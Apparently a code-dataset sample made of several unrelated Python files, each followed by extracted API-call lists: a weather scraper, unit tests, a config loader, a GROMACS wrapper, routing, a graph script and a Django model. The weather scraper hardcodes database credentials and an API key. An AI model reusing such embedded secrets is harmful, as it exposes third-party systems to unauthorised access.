from sqlalchemy.orm import scoped_session, sessionmaker
from base_file import Base
import time
import datetime
class Weather(Base):
"""
Create a Weather table
"""
__tablename__ = 'weather1'
id = Column(Integer, nullable=False, primary_key ='True')
name = Column(String(100), nullable = False)
humidity = Column(Integer ,nullable = False)
temp = Column(Integer, nullable=False)
temp_max = Column(Integer, nullable=False)
temp_min = Column(Integer, nullable=False)
description = Column(String(100), nullable = False)
icon = Column(String(100), nullable = False)
main_description = Column(String(100), nullable = False)
timeDate = Column(String (100), primary_key=True, nullable=False)
def getWeatherData(self):
weather_engine = create_engine('mysql+mysqlconnector://CGSdatabase:password@dublinbikes.ctaptplk7c5t.eu-west-1.rds.amazonaws.com/dublinbikes', convert_unicode=True)
Session = sessionmaker(bind=weather_engine)
talk_session = Session()
Base.metadata.create_all(bind=weather_engine)
while True:
try:
STATIONS_URI = "api.openweathermap.org/data/2.5/weather?"
api_url = 'http://api.openweathermap.org/data/2.5/weather'
appid = "033bc70c21f56a4af381b76c18f81458"
r = requests.get(url=api_url, params=dict(q='Dublin', APPID=appid))
#pprint(r)
data = r.json()
#pprint(data)
self.writeToDatabase(weather_engine,talk_session,data)
time.sleep(30*60)
except:
if weather_engine is None:
print(traceback.format_exc())
talk_session.close()
return
def writeToDatabase(self, weather_engine, talk_session, data):
self.data = data
now = datetime.datetime.now()
weather = Weather(id=self.data["id"],
name=self.data["name"],
humidity=self.data["main"]["humidity"],
temp_max=self.data["main"]["temp_max"],
temp_min=self.data["main"]["temp_min"],
temp=self.data["main"]["temp"],
description=self.data["weather"][0]["description"],
icon=self.data["weather"][0]["icon"],
main_description=self.data["weather"][0]["main"],
timeDate=now)
talk_session.add(weather)
talk_session.commit()
return
|
[
"base_file.Base.metadata.create_all",
"datetime.datetime.now",
"time.sleep",
"sqlalchemy.Column",
"sqlalchemy.String",
"sqlalchemy.orm.sessionmaker",
"sqlalchemy.create_engine"
] |
[((375, 426), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)', 'primary_key': '"""True"""'}), "(Integer, nullable=False, primary_key='True')\n", (381, 426), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((492, 523), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)'}), '(Integer, nullable=False)\n', (498, 523), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((537, 568), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)'}), '(Integer, nullable=False)\n', (543, 568), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((584, 615), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)'}), '(Integer, nullable=False)\n', (590, 615), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((631, 662), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)'}), '(Integer, nullable=False)\n', (637, 662), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((446, 457), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (452, 457), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((688, 699), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (694, 699), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((737, 748), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (743, 748), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((798, 809), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (804, 809), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((851, 862), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (857, 862), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((972, 1129), 'sqlalchemy.create_engine', 'create_engine', (['"""mysql+mysqlconnector://CGSdatabase:password@dublinbikes.ctaptplk7c5t.eu-west-1.rds.amazonaws.com/dublinbikes"""'], {'convert_unicode': '(True)'}), "(\n 'mysql+mysqlconnector://CGSdatabase:password@dublinbikes.ctaptplk7c5t.eu-west-1.rds.amazonaws.com/dublinbikes'\n , convert_unicode=True)\n", (985, 1129), False, 'from sqlalchemy import create_engine\n'), ((1139, 1172), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'weather_engine'}), '(bind=weather_engine)\n', (1151, 1172), False, 'from sqlalchemy.orm import scoped_session, sessionmaker\n'), ((1214, 1259), 'base_file.Base.metadata.create_all', 'Base.metadata.create_all', ([], {'bind': 'weather_engine'}), '(bind=weather_engine)\n', (1238, 1259), False, 'from base_file import Base\n'), ((2116, 2139), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2137, 2139), False, 'import datetime\n'), ((1798, 1817), 'time.sleep', 'time.sleep', (['(30 * 60)'], {}), '(30 * 60)\n', (1808, 1817), False, 'import time\n')]
|
#! /usr/bin/env python3
"""
Unittests for the CSD module
"""
import unittest
import pycsd.csd as csd
good_values_dict = {
32: '+00000',
-32: '-00000',
0: '0',
7: '+00-',
15: '+000-'
}
class tests__integers(unittest.TestCase):
def test__01_to_integer(self):
""" Check conversion from CSD to integer """
for key in good_values_dict.keys():
csd_str = good_values_dict[key]
value = csd.to_decimal(csd_str)
self.assertEqual(value, key)
def test__02_to_csd(self):
""" Check that integers are converted to CSD properly. """
for key in good_values_dict.keys():
csd_str = csd.to_csd(key)
self.assertEqual(csd_str, good_values_dict[key])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(tests__integers))
return suite
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"unittest.TestSuite",
"unittest.makeSuite",
"pycsd.csd.to_csd",
"pycsd.csd.to_decimal"
] |
[((784, 804), 'unittest.TestSuite', 'unittest.TestSuite', ([], {}), '()\n', (802, 804), False, 'import unittest\n'), ((910, 925), 'unittest.main', 'unittest.main', ([], {}), '()\n', (923, 925), False, 'import unittest\n'), ((823, 858), 'unittest.makeSuite', 'unittest.makeSuite', (['tests__integers'], {}), '(tests__integers)\n', (841, 858), False, 'import unittest\n'), ((449, 472), 'pycsd.csd.to_decimal', 'csd.to_decimal', (['csd_str'], {}), '(csd_str)\n', (463, 472), True, 'import pycsd.csd as csd\n'), ((680, 695), 'pycsd.csd.to_csd', 'csd.to_csd', (['key'], {}), '(key)\n', (690, 695), True, 'import pycsd.csd as csd\n')]
|
"""
Load an XML :ref:`configuration_file`.
"""
import os
import logging
from xml.etree import cElementTree as ET
from .database import Database
logger = logging.getLogger(__name__)
class Config(object):
PyVISA_LIBRARY = '@ni'
""":class:`str`: The PyVISA backend_ library to use.
.. _backend: https://pyvisa.readthedocs.io/en/stable/backends.html
"""
DEMO_MODE = False
""":class:`bool`: Whether to open connections in demo mode.
The equipment does not need to be physically connected to a computer.
"""
PATH = []
""":class:`list` of :class:`str`: Paths are also appended to :data:`os.environ['PATH'] <os.environ>`."""
def __init__(self, path):
"""Load an XML :ref:`configuration_file`.
This function is used to set the configuration constants to use for the Python runtime
and it allows you to access :class:`.EquipmentRecord`'s from an :ref:`equipment_database`
and :class:`.ConnectionRecord`'s from a :ref:`connections_database`.
**MSL-Equipment** constants that can be defined in a :ref:`configuration_file`:
+----------------+-----------------------------------+-----------------------------------------+
| Name | Example Values | Description |
+================+===================================+=========================================+
| pyvisa_library | @ni, @py, @sim, /path/to/lib\@ni | The PyVISA backend_ library to use. |
+----------------+-----------------------------------+-----------------------------------------+
| demo_mode | true, false | Whether to open connections in demo |
| | | mode. |
+----------------+-----------------------------------+-----------------------------------------+
| path | /path/to/SDKs, D:/images | A path that contains external resources.|
| | | Accepts a *recursive="true"* attribute. |
| | | Appends the path(s) to |
| | | :data:`os.environ['PATH'] <os.environ>` |
| | | and to :attr:`.PATH` |
+----------------+-----------------------------------+-----------------------------------------+
Also, the user is encouraged to define their own application-specific constants within the
configuration file.
.. _backend: https://pyvisa.readthedocs.io/en/stable/backends.html
Parameters
----------
path : :class:`str`
The path to an XML :ref:`configuration_file`.
Raises
------
IOError
If `path` does not exist or if the :ref:`configuration_file` is invalid.
"""
logger.debug('Loading {}'.format(path))
try:
self._root = ET.parse(path).getroot()
parse_err = ''
except ET.ParseError as err:
parse_err = str(err)
if parse_err:
raise IOError(parse_err)
self._path = path
self._database = None
element = self._root.find('pyvisa_library')
if element is not None:
Config.PyVISA_LIBRARY = element.text
logger.debug('update Config.PyVISA_LIBRARY = {}'.format(Config.PyVISA_LIBRARY))
element = self._root.find('demo_mode')
if element is not None:
Config.DEMO_MODE = element.text.lower() == 'true'
logger.debug('update Config.DEMO_MODE = {}'.format(Config.DEMO_MODE))
for element in self._root.findall('path'):
if not os.path.isdir(element.text):
logger.warning('Not a valid PATH ' + element.text)
continue
if element.attrib.get('recursive', 'false').lower() == 'true':
for root, dirs, files in os.walk(element.text):
Config.PATH.append(root)
else:
Config.PATH.append(element.text)
for p in Config.PATH:
os.environ['PATH'] += os.pathsep + p
logger.debug('append Config.PATH %s', p)
@property
def path(self):
""":class:`str`: The path to the configuration file."""
return self._path
@property
def root(self):
"""Returns the root element (the first node) of the XML tree.
Returns
-------
:class:`~xml.etree.ElementTree.Element`
The root element.
"""
return self._root
def database(self):
"""
Returns
-------
:class:`~.database.Database`
A reference to the equipment and connection records in the database(s)
that are specified in the configuration file.
"""
if self._database is None:
self._database = Database(self._path)
return self._database
def value(self, tag):
"""Gets the value associated with the specified `tag` in the configuration file.
Parameters
----------
tag : :class:`str`
The name of a XML tag in the configuration file.
Returns
-------
:class:`str` or :data:`None`
The value associated with the `tag` or :data:`None` if the tag cannot be found.
"""
element = self._root.find(tag)
if element is not None:
return element.text
return None
|
[
"os.path.isdir",
"xml.etree.cElementTree.parse",
"os.walk",
"logging.getLogger"
] |
[((155, 182), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (172, 182), False, 'import logging\n'), ((3906, 3933), 'os.path.isdir', 'os.path.isdir', (['element.text'], {}), '(element.text)\n', (3919, 3933), False, 'import os\n'), ((4143, 4164), 'os.walk', 'os.walk', (['element.text'], {}), '(element.text)\n', (4150, 4164), False, 'import os\n'), ((3146, 3160), 'xml.etree.cElementTree.parse', 'ET.parse', (['path'], {}), '(path)\n', (3154, 3160), True, 'from xml.etree import cElementTree as ET\n')]
|
#!/usr/bin/env python
"""Python wrapper module for the GROMACS genrestr module
"""
import sys
import re
import json
import os
import configuration.settings as settings
from command_wrapper import cmd_wrapper
from tools import file_utils as fu
class Genrestr(object):
"""Wrapper class for the GROMACS genrestr module.
Args:
input_structure_path (str): Path to the input structure PDB/GRO/TPR file.
input_ndx_path (str): Path to the input index NDX file.
input_top_zip_path (str): Path the input TOP topology in zip format.
output_top_zip_path (str): Path the output TOP topology in zip format.
properties (dic):
| **output_top_path** (*str*): Path the output TOP file.
| **output_itp_path** (*str*): Path to the output include for topology ITP file.
| **force_constants** (*float[3]*): Array of three floats defining the force constants
"""
def __init__(self, input_structure_path, input_ndx_path, input_top_zip_path,
output_top_zip_path, properties, **kwargs):
if isinstance(properties, basestring):
properties=json.loads(properties)
self.input_structure_path = input_structure_path
self.input_ndx_path = input_ndx_path
self.input_top_zip_path = input_top_zip_path
self.output_top_zip_path = output_top_zip_path
self.output_itp_path = properties.get('output_itp_path','restrain.itp')
self.output_top_path = properties.get('output_top_path','restrain.top')
self.force_constants = properties.get('force_constants','500 500 500')
self.restricted_group = properties.get('restricted_group', 'system')
self.gmx_path = properties.get('gmx_path',None)
self.mutation = properties.get('mutation',None)
self.step = properties.get('step',None)
self.path = properties.get('path','')
self.mpirun = properties.get('mpirun',False)
self.mpirun_np = properties.get('mpirun_np',None)
def launch(self):
"""Launches the execution of the GROMACS pdb2gmx module.
"""
out_log, err_log = fu.get_logs(path=self.path, mutation=self.mutation, step=self.step)
self.output_top_path = fu.add_step_mutation_path_to_name(self.output_top_path, self.step, self.mutation)
self.output_itp_path = fu.add_step_mutation_path_to_name(self.output_itp_path, self.step, self.mutation)
gmx = "gmx" if self.gmx_path is None else self.gmx_path
cmd = [gmx, "genrestr", "-f", self.input_structure_path,
"-n", self.input_ndx_path, "-o", self.output_itp_path,
"-fc", self.force_constants]
if self.mpirun_np is not None:
cmd.insert(0, str(self.mpirun_np))
cmd.insert(0, '-np')
if self.mpirun:
cmd.insert(0, 'mpirun')
if self.mpirun:
cmd.append('<<<')
cmd.append('\"'+self.restricted_group+'\"')
else:
cmd.insert(0, '|')
cmd.insert(0, '\"'+self.restricted_group+'\"')
cmd.insert(0, 'echo')
command = cmd_wrapper.CmdWrapper(cmd, out_log, err_log)
returncode = command.launch()
fu.unzip_top(zip_file=self.input_top_zip_path, top_file=self.output_top_path)
out_log.info('Unzip: '+ self.input_top_zip_path + ' to: '+self.output_top_path)
with open(self.output_top_path, 'r') as fin:
for line in fin:
if line.startswith('#ifdef POSRES'):
itp_name = re.findall('"([^"]*)"',fin.next())[0]
out_log.debug('itp_name: '+itp_name)
break
# with open(self.output_top_path, 'r') as fin:
# data = fin.read().splitlines(True)
# index = data.index('#ifdef POSRES\n')
# data[index+2] = 'system\n'
# data.insert(index, '\n')
# data.insert(index, '#endif\n')
# data.insert(index, '#include "'+self.output_itp_path+'"\n')
# data.insert(index, '#ifdef CUSTOM_POSRES\n')
# data.insert(index, '; Include Position restraint file\n')
# # data.insert(index, '#include "'+self.output_itp_path+'"\n')
# # data.insert(index, '; Include genrestr generated itp\n')
# with open(self.output_top_path, 'w') as fout:
# fout.writelines(data)
with open(self.output_itp_path, 'r') as fin:
data = fin.read().splitlines(True)
# data.insert(0, '\n')
# data.insert(0, 'system 3\n')
# data.insert(0, ';Name nrexcl\n')
# data.insert(0, '[ system ]\n')
with open(itp_name, 'w') as fout:
fout.writelines(data)
os.remove(self.output_itp_path)
# zip topology
fu.zip_top(self.output_top_path, self.output_top_zip_path, remove_files=False)
out_log.info('Zip: '+ self.output_top_path +' to: '+ self.output_top_zip_path)
return returncode
#Creating a main function to be compatible with CWL
def main():
system=sys.argv[1]
step=sys.argv[2]
properties_file=sys.argv[3]
prop = settings.YamlReader(properties_file, system).get_prop_dic()[step]
Pdb2gmx(input_structure_pdb_path=sys.argv[4],
output_gro_path=sys.argv[5],
output_top_zip_path=sys.argv[6],
properties=prop).launch()
if __name__ == '__main__':
main()
|
[
"os.remove",
"tools.file_utils.zip_top",
"tools.file_utils.add_step_mutation_path_to_name",
"json.loads",
"command_wrapper.cmd_wrapper.CmdWrapper",
"tools.file_utils.get_logs",
"tools.file_utils.unzip_top",
"configuration.settings.YamlReader"
] |
[((2138, 2205), 'tools.file_utils.get_logs', 'fu.get_logs', ([], {'path': 'self.path', 'mutation': 'self.mutation', 'step': 'self.step'}), '(path=self.path, mutation=self.mutation, step=self.step)\n', (2149, 2205), True, 'from tools import file_utils as fu\n'), ((2237, 2323), 'tools.file_utils.add_step_mutation_path_to_name', 'fu.add_step_mutation_path_to_name', (['self.output_top_path', 'self.step', 'self.mutation'], {}), '(self.output_top_path, self.step, self.\n mutation)\n', (2270, 2323), True, 'from tools import file_utils as fu\n'), ((2350, 2436), 'tools.file_utils.add_step_mutation_path_to_name', 'fu.add_step_mutation_path_to_name', (['self.output_itp_path', 'self.step', 'self.mutation'], {}), '(self.output_itp_path, self.step, self.\n mutation)\n', (2383, 2436), True, 'from tools import file_utils as fu\n'), ((3124, 3169), 'command_wrapper.cmd_wrapper.CmdWrapper', 'cmd_wrapper.CmdWrapper', (['cmd', 'out_log', 'err_log'], {}), '(cmd, out_log, err_log)\n', (3146, 3169), False, 'from command_wrapper import cmd_wrapper\n'), ((3217, 3294), 'tools.file_utils.unzip_top', 'fu.unzip_top', ([], {'zip_file': 'self.input_top_zip_path', 'top_file': 'self.output_top_path'}), '(zip_file=self.input_top_zip_path, top_file=self.output_top_path)\n', (3229, 3294), True, 'from tools import file_utils as fu\n'), ((4759, 4790), 'os.remove', 'os.remove', (['self.output_itp_path'], {}), '(self.output_itp_path)\n', (4768, 4790), False, 'import os\n'), ((4824, 4902), 'tools.file_utils.zip_top', 'fu.zip_top', (['self.output_top_path', 'self.output_top_zip_path'], {'remove_files': '(False)'}), '(self.output_top_path, self.output_top_zip_path, remove_files=False)\n', (4834, 4902), True, 'from tools import file_utils as fu\n'), ((1145, 1167), 'json.loads', 'json.loads', (['properties'], {}), '(properties)\n', (1155, 1167), False, 'import json\n'), ((5168, 5212), 'configuration.settings.YamlReader', 'settings.YamlReader', (['properties_file', 'system'], {}), '(properties_file, system)\n', (5187, 5212), True, 'import configuration.settings as settings\n')]
|
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter
import cost_claimer.routing
import cost_claimer.consumers
application = ProtocolTypeRouter({
'websocket': AuthMiddlewareStack(
URLRouter(
cost_claimer.routing.websocket_urlpatterns
)
),
"channel": ChannelNameRouter({
"user_action": cost_claimer.consumers.GroupCostWorker,
}),
})
|
[
"channels.routing.ChannelNameRouter",
"channels.routing.URLRouter"
] |
[((363, 437), 'channels.routing.ChannelNameRouter', 'ChannelNameRouter', (["{'user_action': cost_claimer.consumers.GroupCostWorker}"], {}), "({'user_action': cost_claimer.consumers.GroupCostWorker})\n", (380, 437), False, 'from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter\n'), ((265, 318), 'channels.routing.URLRouter', 'URLRouter', (['cost_claimer.routing.websocket_urlpatterns'], {}), '(cost_claimer.routing.websocket_urlpatterns)\n', (274, 318), False, 'from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter\n')]
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import pandas as pd
import numpy as np
import seaborn as sns
import mysql.connector
from sqlalchemy import create_engine
import nltk
import re
from nltk.corpus import stopwords
import string
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
from nltk.stem import SnowballStemmer
import pickle
import itertools
import networkx as nx
import time
from datetime import datetime, timedelta, date
from timeit import default_timer as timer
from sys import argv
db_name_table = 'PostsMadCar'#str(argv[1])
#db_name_table = 'PostsCorMad'#str(argv[1])
db2='UsersMadCar'#str(argv[1])
#db2='UsersCorMad'#str(argv[1])
datapath='/home/davidpastor/Narrativas/MadCar/'
#datapath='/home/davidpastor/Narrativas/CorMad/'
tag=''
th=10
start=timer()
path_graphs = 'People/'
with open(datapath+path_graphs+db_name_table+'NetPeople'+tag+'.cnf', 'rb') as handle:
Gu=pickle.load(handle)
with open(datapath+path_graphs+db_name_table+'NetDPeople'+tag+'.cnf', 'rb') as handle:
G=pickle.load(handle)
with open(datapath+path_graphs+db2+'People'+tag+'.cnf', 'rb') as handle:
People=pickle.load(handle)
Gu.remove_node('None')
G.remove_node('None')
nu=Gu.nodes()
vu=[]
gudata=Gu.nodes.data()
for n in nu:
vu.append(Gu.degree(n))
# if 'followers' in gudata[n]:
# print('hola')
print(len(vu))
vuc=[i for i in vu if i>10]
print(len(vuc))
sns.set_style('darkgrid')
sns_plot = sns.distplot(vu)
sns_plot.figure.savefig("Gu_nodehist.png")
ns=G.nodes()
v=[]
gdata=G.nodes.data()
for n in ns:
v.append(G.out_degree(n))
# if 'followers' in gdata[n]:
# print('hola')
print(len(v))
vc=[i for i in v if i>10]
print(len(vc))
v2=[]
for n in ns:
v2.append(G.in_degree(n))
print(len(v2))
vc2=[i for i in v2 if i>10]
print(len(vc2))
sns.set_style('darkgrid')
sns_plot = sns.distplot(v)
sns_plot.figure.savefig("G_nodehist.png")
Guf=Gu.copy()
nus=Gu.nodes()
for n in nus:
dn=Gu.degree(n)
if dn<th:
Guf.remove_node(n)
Gf=G.copy()
ns=G.nodes()
for n in ns:
dn=G.out_degree(n)
if dn<th:
Gf.remove_node(n)
print(len(Guf.nodes()))
print(len(Gf.nodes()))
path_graphs = 'People/'
nx.write_gexf(Guf, datapath+path_graphs+db_name_table+'NetworkGraphPeople'+tag+'_f.gexf')
with open(datapath+path_graphs+db_name_table+'NetPeople'+tag+'_f.cnf', 'wb') as handle:
pickle.dump(Guf, handle, protocol=pickle.HIGHEST_PROTOCOL)
nx.write_gexf(Gf, datapath+path_graphs+db_name_table+'NetworkGraphDPeople'+tag+'_f.gexf')
with open(datapath+path_graphs+db_name_table+'NetDPeople'+tag+'_f.cnf', 'wb') as handle:
pickle.dump(Gf, handle, protocol=pickle.HIGHEST_PROTOCOL)
|
[
"seaborn.set_style",
"pickle.dump",
"timeit.default_timer",
"pickle.load",
"seaborn.distplot",
"networkx.write_gexf"
] |
[((822, 829), 'timeit.default_timer', 'timer', ([], {}), '()\n', (827, 829), True, 'from timeit import default_timer as timer\n'), ((1444, 1469), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (1457, 1469), True, 'import seaborn as sns\n'), ((1484, 1500), 'seaborn.distplot', 'sns.distplot', (['vu'], {}), '(vu)\n', (1496, 1500), True, 'import seaborn as sns\n'), ((1851, 1876), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (1864, 1876), True, 'import seaborn as sns\n'), ((1891, 1906), 'seaborn.distplot', 'sns.distplot', (['v'], {}), '(v)\n', (1903, 1906), True, 'import seaborn as sns\n'), ((2244, 2347), 'networkx.write_gexf', 'nx.write_gexf', (['Guf', "(datapath + path_graphs + db_name_table + 'NetworkGraphPeople' + tag +\n '_f.gexf')"], {}), "(Guf, datapath + path_graphs + db_name_table +\n 'NetworkGraphPeople' + tag + '_f.gexf')\n", (2257, 2347), True, 'import networkx as nx\n'), ((2496, 2599), 'networkx.write_gexf', 'nx.write_gexf', (['Gf', "(datapath + path_graphs + db_name_table + 'NetworkGraphDPeople' + tag +\n '_f.gexf')"], {}), "(Gf, datapath + path_graphs + db_name_table +\n 'NetworkGraphDPeople' + tag + '_f.gexf')\n", (2509, 2599), True, 'import networkx as nx\n'), ((949, 968), 'pickle.load', 'pickle.load', (['handle'], {}), '(handle)\n', (960, 968), False, 'import pickle\n'), ((1066, 1085), 'pickle.load', 'pickle.load', (['handle'], {}), '(handle)\n', (1077, 1085), False, 'import pickle\n'), ((1172, 1191), 'pickle.load', 'pickle.load', (['handle'], {}), '(handle)\n', (1183, 1191), False, 'import pickle\n'), ((2431, 2489), 'pickle.dump', 'pickle.dump', (['Guf', 'handle'], {'protocol': 'pickle.HIGHEST_PROTOCOL'}), '(Guf, handle, protocol=pickle.HIGHEST_PROTOCOL)\n', (2442, 2489), False, 'import pickle\n'), ((2684, 2741), 'pickle.dump', 'pickle.dump', (['Gf', 'handle'], {'protocol': 'pickle.HIGHEST_PROTOCOL'}), '(Gf, handle, protocol=pickle.HIGHEST_PROTOCOL)\n', (2695, 2741), False, 'import pickle\n')]
|
import json
import os
from torch.utils.data import Dataset
from tools.dataset_tool import dfs_search
class JsonFromFilesDataset(Dataset):
def __init__(self, config, mode, encoding="utf8", *args, **params):
self.config = config
self.mode = mode
self.file_list = []
self.data_path = config.get("data", "%s_data_path" % mode)
self.encoding = encoding
filename_list = config.get("data", "%s_file_list" % mode).replace(" ", "").split(",")
recursive = config.getboolean("data", "recursive")
for name in filename_list:
self.file_list = self.file_list + dfs_search(os.path.join(self.data_path, name), recursive)
self.file_list.sort()
self.load_mem = config.getboolean("data", "load_into_mem")
self.json_format = config.get("data", "json_format")
if self.load_mem:
self.data = []
for filename in self.file_list:
if self.json_format == "single":
self.data = self.data + json.load(open(filename, "r", encoding=encoding))
else:
f = open(filename, "r", encoding=encoding)
for line in f:
self.data.append(json.loads(line))
else:
self.total = 0
self.prefix_file_cnt = []
if self.json_format == "single":
self.temp_data = {
"data": json.load(open(self.file_list[0], "r", encoding=encoding)),
"file_id": 0
}
else:
self.temp_file_list = []
for filename in self.file_list:
if self.json_format == "single":
data = json.load(open(filename, "r", encoding=encoding))
self.prefix_file_cnt.append(len(data))
else:
f = open(filename, "r", encoding=encoding)
cnt = 0
for line in f:
cnt += 1
f.close()
self.temp_file_list.append({
"file": open(filename, "r", encoding=encoding),
"cnt": 0
})
self.prefix_file_cnt.append(cnt)
for a in range(1, len(self.prefix_file_cnt)):
self.prefix_file_cnt[a] += self.prefix_file_cnt[a - 1]
self.total = self.prefix_file_cnt[-1]
def get_file_id(self, item):
l = 0
r = len(self.prefix_file_cnt)
while l + 1 != r:
m = (l + r) // 2
if self.prefix_file_cnt[m-1] <= item:
l = m
else:
r = m
return l
def __getitem__(self, item):
if self.load_mem:
return self.data[item]
else:
which = self.get_file_id(item)
if which == 0:
idx = item
else:
idx = item - self.prefix_file_cnt[which - 1]
if self.json_format == "single":
if self.temp_data["file_id"] != which:
self.temp_data = {
"data": json.load(open(self.file_list[which], "r", encoding=self.encoding)),
"file_id": 0
}
return self.temp_data["data"][idx]
else:
if self.temp_file_list[which]["cnt"] > idx:
self.temp_file_list[which] = {
"file": open(self.file_list[which], "r", encoding=self.encoding),
"cnt": 0
}
delta = idx - self.temp_file_list[which]["cnt"]
self.temp_file_list[which]["file"].readlines(delta)
data = json.loads(self.temp_file_list[which]["file"].readline())
self.temp_file_list[which]["cnt"] = idx + 1
return data
def __len__(self):
if self.load_mem:
return len(self.data)
else:
return self.total
|
[
"os.path.join",
"json.loads"
] |
[((642, 676), 'os.path.join', 'os.path.join', (['self.data_path', 'name'], {}), '(self.data_path, name)\n', (654, 676), False, 'import os\n'), ((1250, 1266), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (1260, 1266), False, 'import json\n')]
|
from django.db import models
from django.utils import timezone
import json, os
class Cases(models.Model):
'''
Example Case:
{
"age": "",
"asset_id": "",
"assigned_user_id": "19x91",
"billable_time": "",
"billing_service": "",
"case_no": "CC21063",
"casechannel": "",
"casepriority": "Medium",
"casestatus": "Open",
"cf_1152": "",
"cf_cases_autocommunicate": "1",
"cf_cases_awaitingfeedback": "0",
"contact_id": "4x316167",
"created_user_id": "19x93",
"createdtime": "2020-11-25 18:26:04",
"current_state_entry_time": "2020-11-25 18:59:55",
"customer_reply": "0",
"deferred_date": "",
"description": "Video needed in FMS for Truck 20",
"email": "",
"first_response_actualon": "",
"first_response_expectedon": "2020-11-30 16:26:00",
"first_response_status": "Time Left",
"from_portal": "0",
"group_id": "20x5",
"id": "39x916810",
"impact_area": "",
"impact_type": "",
"is_billable": "0",
"is_billed": "0",
"isclosed": "0",
"last_responded_on": "",
"modifiedby": "19x6",
"modifiedtime": "2020-11-25 19:03:26",
"parent_id": "3x220302",
"product_id": "",
"rate": "",
"reassign_count": "0",
"reopen_count": "0",
"resolution": "",
"resolution_time": "0.000",
"resolution_type": "",
"satisfaction_feedback": "",
"satisfaction_index": "",
"servicecontract_id": "",
"servicelocation": "",
"servicetype": "",
"sla_actual_closureon": "",
"sla_closureon": "2020-12-10 17:26:00",
"slaid": "38x9",
"slastatus": "Running",
"source": "CRM",
"starred": "",
"tags": "",
"time_spent": "0.594",
"title": "Video needed in FMS for Truck 20",
"total_time": "0",
"wait_count": "",
"work_location": "",
"assigned_username" = "Bradley Spenkins",
"assigned_groupname" = "Tech Support",
},
'''
assigned_user_id = models.CharField(max_length=50)
modifiedby = models.CharField(max_length=50, default='')
case_no = models.CharField(max_length=50)
casestatus = models.CharField(max_length=50)
contact_id = models.CharField(max_length=50)
created_user_id = models.CharField(max_length=50)
createdtime = models.DateTimeField()
group_id = models.CharField(max_length=50)
case_id = models.CharField(max_length=50)
case_url_id = models.CharField(max_length=50, default='')
modifiedby = models.CharField(max_length=50)
modifiedtime = models.DateTimeField()
title = models.CharField(max_length=250)
time_spent = models.CharField(max_length=50)
time_spent_hr = models.CharField(max_length=75)
assigned_username = models.CharField(max_length=75)
modified_username = models.CharField(max_length=75, default='')
assigned_groupname = models.CharField(max_length=75)
satisfaction_feedback = models.CharField(max_length=250, default='')
satisfaction_index = models.CharField(max_length=50, default='')
case_resolved = models.DateTimeField(null=True)
date_created = models.DateTimeField(auto_now_add=True)
date_modified = models.DateTimeField(auto_now=True)
def __str__(self):
return f'{self.assigned_groupname} - {self.assigned_username} - {self.case_no} - {self.date_modified.strftime("%Y-%m-%d %H:%M:%S")}'
def modifiedtime_date(self):
return self.modifiedtime.strftime('%Y-%m-%d')
|
[
"django.db.models.CharField",
"django.db.models.DateTimeField"
] |
[((2198, 2229), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2214, 2229), False, 'from django.db import models\n'), ((2247, 2290), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '""""""'}), "(max_length=50, default='')\n", (2263, 2290), False, 'from django.db import models\n'), ((2305, 2336), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2321, 2336), False, 'from django.db import models\n'), ((2354, 2385), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2370, 2385), False, 'from django.db import models\n'), ((2403, 2434), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2419, 2434), False, 'from django.db import models\n'), ((2457, 2488), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2473, 2488), False, 'from django.db import models\n'), ((2507, 2529), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (2527, 2529), False, 'from django.db import models\n'), ((2545, 2576), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2561, 2576), False, 'from django.db import models\n'), ((2591, 2622), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2607, 2622), False, 'from django.db import models\n'), ((2641, 2684), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '""""""'}), "(max_length=50, default='')\n", (2657, 2684), False, 'from django.db 